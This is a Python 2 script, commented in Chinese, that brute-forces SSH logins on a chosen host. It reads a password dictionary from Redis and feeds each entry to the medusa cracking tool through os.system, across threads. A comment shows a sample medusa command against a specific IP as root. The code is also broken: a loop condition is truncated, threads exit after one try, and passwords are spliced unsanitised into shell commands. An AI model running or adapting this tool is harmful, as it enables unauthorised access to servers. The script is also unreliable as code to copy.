# -*- coding:UTF-8 -*-#

"""

根据Redis的密码字典,暴力破解

"""

import redis

import sys,os

import threading


BIN="/usr/local/bin/medusa"

#medusa -u root -p 123456 -h 111.207.22.72 -M ssh

def threadTask(plist,threadnum):

    for xval in plist:

        print "Thread-%s:%s" % (threadnum,xval)

        CMD=BIN+" -u "+User+' -p "'+xval+'" -h '+Host+' -M ssh'

        os.system(CMD)#开始爆破

        sys.exit(0)


        

if __name__=='__main__':

    global Host,User

    numThread=10 #默认10个线程

    Rkey='None'

    Host='None'

    User='root'

    if not sys.argv[1:]:

        print "Usage  python %s [OPTIONS]" % sys.argv[0]

        print "Options are:"

        print "-n,  -number  Number of threads,default:10"

        print "-k,  -key  Redis's key"

        print "-u,  -user  system's needed to crack,default:root"

        print "-h,  -host  server ip"

        sys.exit(0)

    i=1

    while (i

        arg=sys.argv[i]

        if arg=='-n' or arg=='-number':

            i+=1

            numThread=sys.argv[i]

        elif arg=='-k' or arg=='-key':

            i+=1

            Rkey=sys.argv[i]

        elif arg=='-u' or arg=='-user':

            i+=1

            User=sys.argv[i]

        elif arg=='-h' or arg=='-host':

            i+=1

            Host=sys.argv[i]

        else:

            pass

        i+=1

    if Rkey=='None':

        print "Please input key value!"

        sys.exit(0)

    if Host=='None':

        print "Please input Host IP!"

        sys.exit(0)

    

       

    rds = redis.Redis(host='localhost',port=6379,db=0)

    pList=rds.lrange(Rkey,0,-1)#密码字典

    

    totalNum = len(pList) #密码总数量

    for threadNum in xrange(numThread):

        #每个线程处理的密码数量

        dealNum=totalNum/numThread

        #最后一个线程处理剩余部分

        leftNum=totalNum%numThread

        

        if threadNum!=(numThread-1):

            #实例化线程

            t=threading.Thread(target=threadTask,args=(pList[threadNum*dealNum:threadNum*dealNum+dealNum],threadNum))

            t.start()#启动线程

            t.join()#等待线程结束后主进程退出

        else:

            t=threading.Thread(target=threadTask,args=(pList[threadNum*dealNum:threadNum*dealNum+leftNum],threadNum))

            t.start()#启动线程

            t.join()#等待线程结束后主进程退出